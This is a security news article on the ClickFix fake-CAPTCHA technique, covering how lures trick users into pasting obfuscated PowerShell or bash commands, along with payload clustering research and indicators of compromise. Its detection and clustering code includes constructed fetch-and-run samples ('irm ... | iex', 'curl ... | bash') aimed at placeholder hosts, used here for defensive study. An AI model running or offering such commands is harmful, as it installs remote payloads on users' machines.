Fake CAPTCHA Used in New ClickFix Attack to Deploy Malware Payload

ClickFix, which began as a red-team simulation tool in September 2024, has quickly developed into a widespread malware delivery system that outcompetes its predecessors, such as the ClearFake phony browser update fraud.

Initially demonstrated by security researcher John Hammond for educational purposes, this fake CAPTCHA technique tricks users into executing malicious PowerShell commands via clipboard manipulation, bypassing traditional file downloads.

By late 2024, Proofpoint had dubbed the technique ClickFix, marking its shift away from EtherHiding tactics (hiding loader code in Ethereum smart contracts) toward more insidious social engineering.

This “CAPTCHAgeddon” variant leverages trusted infrastructure to enable both drive-by infections and spear-phishing, resulting in widespread deployment of infostealers such as Lumma, which exfiltrate credentials and other data from the victim machine.

Evasion Tactics Driving Infections

ClickFix’s propagation has diversified. It started with malvertising on shady ad networks that target streaming and software sites, and has since moved to compromised WordPress platforms with high SEO rankings, where a fake CAPTCHA overlays the legitimate content and is triggered by user interaction so that it blends in naturally.

Figure: ClickFix Attack

According to the report, attackers further exploit social media, GitHub repositories with deceptive READMEs, and SEO-optimized bait sites featuring blurred scraped articles, compelling users to “verify” for access.

In their narrative, these attacks use sophisticated social engineering: they mimic reCAPTCHA or Cloudflare challenges, apply dynamic branding that pulls the visited site’s logo via AdZone IDs, and show urgent prompts such as “suspicious IP detected” to increase persuasion.

In targeted phishing, such as Booking.com impersonations, they redirect from branded pages to themed CAPTCHAs, installing stealers for comprehensive data harvesting rather than single credentials.

Technically, evasion revolves around obfuscated PowerShell commands using casing mutations (e.g., PoWeRsHeLL), ASCII tricks, and dynamic script loading from attacker servers, evading static scanners.

Payloads are embedded in legitimate-looking files such as socket.io.min.js hosted on look-alike CDNs, or abuse Google Scripts for trusted-domain hosting, which reduces suspicion and bypasses filters.

Cross-platform adaptations extend to macOS and Linux via bash scripts, instructing users to paste commands into terminals, exploiting non-technical users’ unfamiliarity.

By mid-2025, these methods have widened the attack surface, with de-obfuscated examples revealing simple curl invocations fetching remote payloads.
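The evasion tricks described above (casing mutations such as PoWeRsHeLL, hidden-window and bypass flags, remote fetch piped into an interpreter, and the curl-to-bash variant on macOS and Linux) are exactly what a clipboard or command-line monitor can look for once the text is case-normalised. The following detection logic is an added example written for this article, not code from Guardio or from the report; the sample command strings are constructed for illustration and point at the reserved example.invalid domain, and the signal names, weights and threshold are assumptions chosen here, not published detection rules.

```python
import re

# Constructed sample clipboard / command-line contents (written for this
# example; they are not payloads captured from the campaign).
SAMPLES = [
    'PoWeRsHeLL -w hidden -c "irm https://example.invalid/verify | iex" '
    "# 'I am not a robot - reCAPTCHA Verification ID: 7291'",
    'powershell -NoP -W Hidden -Ep Bypass -c "iex (New-Object Net.WebClient)'
    ".DownloadString('http://example.invalid/a')\"",
    "curl -fsSL https://example.invalid/setup.sh | bash",
    'powershell -c "Get-Date"',
    "Get-ChildItem C:\\Users",
]

# Regexes are applied to the lower-cased text, so casing mutations in the
# payload do not matter for the keyword signals themselves.
INTERPRETER_RE = re.compile(r"powershell|pwsh|mshta|cmd\.exe", re.I)
DOWNLOAD_RE = re.compile(
    r"\b(irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"downloadfile|curl|wget)\b", re.I)
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b|\|\s*(bash|sh)\b", re.I)
HIDE_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-executionpolicy\s+bypass",
    re.I)
LURE_RE = re.compile(r"not a robot|verification id|recaptcha|cloudflare", re.I)


def looks_case_mutated(token: str) -> bool:
    """True when the token alternates case unnaturally (assumed threshold:
    four or more upper/lower transitions). 'PowerShell' has three and passes;
    'PoWeRsHeLL' has eight and is flagged."""
    letters = [c for c in token if c.isalpha()]
    transitions = sum(1 for a, b in zip(letters, letters[1:])
                      if a.isupper() != b.isupper())
    return transitions >= 4


def classify(text: str) -> dict:
    """Score one clipboard/command string and return the signals that fired.
    Verdict rule (an assumption of this example): three or more signals, or a
    remote fetch piped straight into an interpreter, is treated as ClickFix-like."""
    norm = text.lower()
    signals = {
        "interpreter": bool(INTERPRETER_RE.search(norm)),
        "downloader": bool(DOWNLOAD_RE.search(norm)),
        "exec_remote": bool(EXEC_RE.search(norm)),
        "hidden_or_bypass": bool(HIDE_RE.search(norm)),
        "captcha_lure": bool(LURE_RE.search(norm)),
        # Casing check runs on the original text, not the normalised copy.
        "case_mutated": any(looks_case_mutated(m)
                            for m in INTERPRETER_RE.findall(text)),
    }
    score = sum(signals.values())
    fetch_and_run = signals["downloader"] and signals["exec_remote"]
    verdict = "clickfix-like" if score >= 3 or fetch_and_run else "benign"
    return {"score": score, "signals": signals, "verdict": verdict}


if __name__ == "__main__":
    for sample in SAMPLES:
        result = classify(sample)
        fired = [name for name, hit in result["signals"].items() if hit]
        print(f"{result['verdict']:14} score={result['score']} {fired}")
        print(f"    {sample[:70]}")
```

The benign samples show why the rule needs more than one signal: a plain `powershell -c "Get-Date"` trips only the interpreter check and stays below the threshold, while the curl-to-bash line is flagged on the fetch-and-run combination alone even though it carries no PowerShell at all.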

Clustering Reveals Attacker Ecosystems

To dissect this threat landscape, researchers at Guardio applied DBSCAN clustering on thousands of clipboard payloads, extracting features like domain entropy, obfuscation patterns, and command structures.

This unsupervised approach identified distinct clusters, such as Cluster 16’s uniform, non-obfuscated PowerShell fetches from .run/.press TLDs with UUID paths, indicating shared toolkits.

Other clusters show heavy obfuscation or cross-platform hybrids, mapping attacker profiles for proactive blocking.
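To make the clustering step concrete, the example below extracts a small feature vector per clipboard payload (UUID path, case mutation of the interpreter name, .run/.press TLD, Unix pipe-to-shell, and Shannon entropy of the hostname) and runs DBSCAN over it. This is an added example, not Guardio's code or its feature set, and the DBSCAN is a minimal self-contained implementation rather than scikit-learn; the nine payloads are constructed with made-up hostnames, and eps, min_pts, the feature choices and the entropy normalisation are assumptions of this example.

```python
import math
import re

# Constructed sample payloads (made-up hostnames; not data from the report).
# Three look like the "Cluster 16" style described in the article, three use
# casing mutations against look-alike CDN hosts, two are curl-to-shell, and
# the last is a benign command that should end up as noise.
PAYLOADS = [
    'powershell -w hidden -c "irm https://verify.run/3f2a9b1c-7d4e-4a6b-9c1d-0e5f6a7b8c9d | iex"',
    'powershell -w hidden -c "irm https://check.press/0a1b2c3d-4e5f-4061-8a7b-6c5d4e3f2a1b | iex"',
    'powershell -w hidden -c "irm https://step.run/9e8d7c6b-5a4f-4e3d-8c2b-1a0f9e8d7c6b | iex"',
    'PoWeRsHeLL -w hidden -c "iex (iwr https://cdn-static.com/socket.io.min.js -UseBasicParsing).Content"',
    'pOwErShElL -NoP -c "iex (iwr https://secure-update.com/lib/jquery.min.js).Content"',
    'PoWeRsHeLl -ep bypass -c "iex (iwr https://media-host.net/js/app.min.js).Content"',
    "curl -fsSL https://setup-node.sh/install | bash",
    "curl -s https://tool-get.sh/i.sh | sh",
    'powershell -c "Get-Date"',
]

HOST_RE = re.compile(r"https?://([^/\s\"']+)")
UUID_RE = re.compile(r"/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)
INTERP_RE = re.compile(r"powershell|pwsh", re.I)
PIPE_RE = re.compile(r"\|\s*(bash|sh)\b", re.I)
TOOLKIT_TLDS = {"run", "press"}  # TLDs the article associates with one cluster


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; 0.0 for the empty string."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def case_mutated(token: str) -> bool:
    """Four or more upper/lower transitions (assumed threshold) flags mutation."""
    letters = [c for c in token if c.isalpha()]
    return sum(1 for a, b in zip(letters, letters[1:])
               if a.isupper() != b.isupper()) >= 4


def features(payload: str) -> list:
    """Five features, each scaled to [0, 1] so Euclidean distance is meaningful."""
    m = HOST_RE.search(payload)
    host = m.group(1).lower() if m else ""
    tld = host.rsplit(".", 1)[-1] if "." in host else ""
    return [
        1.0 if UUID_RE.search(payload) else 0.0,
        1.0 if any(case_mutated(t) for t in INTERP_RE.findall(payload)) else 0.0,
        1.0 if tld in TOOLKIT_TLDS else 0.0,
        1.0 if PIPE_RE.search(payload) else 0.0,
        min(1.0, shannon_entropy(host) / 5.0),  # 5 bits assumed as the cap
    ]


def dbscan(points: list, eps: float, min_pts: int) -> list:
    """Plain DBSCAN: labels >= 0 are cluster ids, -1 is noise. min_pts counts
    the point itself, as in the original algorithm."""
    dist = lambda a, b: math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))
    n = len(points)
    labels = [None] * n
    neighbours = lambda i: [j for j in range(n) if dist(points[i], points[j]) <= eps]
    cluster = 0
    for i in range(n):
        if labels[i] is not None:
            continue
        nb = neighbours(i)
        if len(nb) < min_pts:
            labels[i] = -1          # provisional noise; may become a border point
            continue
        labels[i] = cluster
        queue = list(nb)
        while queue:
            j = queue.pop()
            if labels[j] == -1:
                labels[j] = cluster  # border point reached from a core point
                continue
            if labels[j] is not None:
                continue
            labels[j] = cluster
            nb_j = neighbours(j)
            if len(nb_j) >= min_pts:
                queue.extend(nb_j)
        cluster += 1
    return labels


def cluster_payloads(payloads: list, eps: float = 0.3, min_pts: int = 2) -> list:
    return dbscan([features(p) for p in payloads], eps, min_pts)


if __name__ == "__main__":
    for label, payload in zip(cluster_payloads(PAYLOADS), PAYLOADS):
        print(f"cluster {label:2d}  {payload[:60]}")
```

With these settings the three plain .run/.press fetches with UUID paths land in one cluster, the three case-mutated CDN look-alikes in another, the two curl-to-shell commands in a third, and the benign command is left as noise. On real data the binary features would be joined by more of the command-structure and obfuscation measures the article mentions, and eps would be tuned against a labelled sample rather than fixed by hand.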

This evolution underscores a viral mutation in cyber threats, displacing older strains through superior infectiousness. Defenders must prioritize behavioral analytics over signatures, as tools like FileFix hint at further adaptations.

Indicators of Compromise (IOCs)

Fake CAPTCHA Sites: 866059[.]eliteeyeview[.]co, a[.]cryptoarabmoon[.]com, adpages[.]com, airscompany[.]com, aljawab24[.]com (partial list; see the full report for more)
Attacker Domains/IPs: 1[.]honis[.]fun, 138[.]199[.]156[.]22, 147[.]45[.]45[.]177, 45[.]135[.]232[.]33, aidetector[.]tools, bitly[.]cx, cubuj[.]press (partial list; see the full report for more)
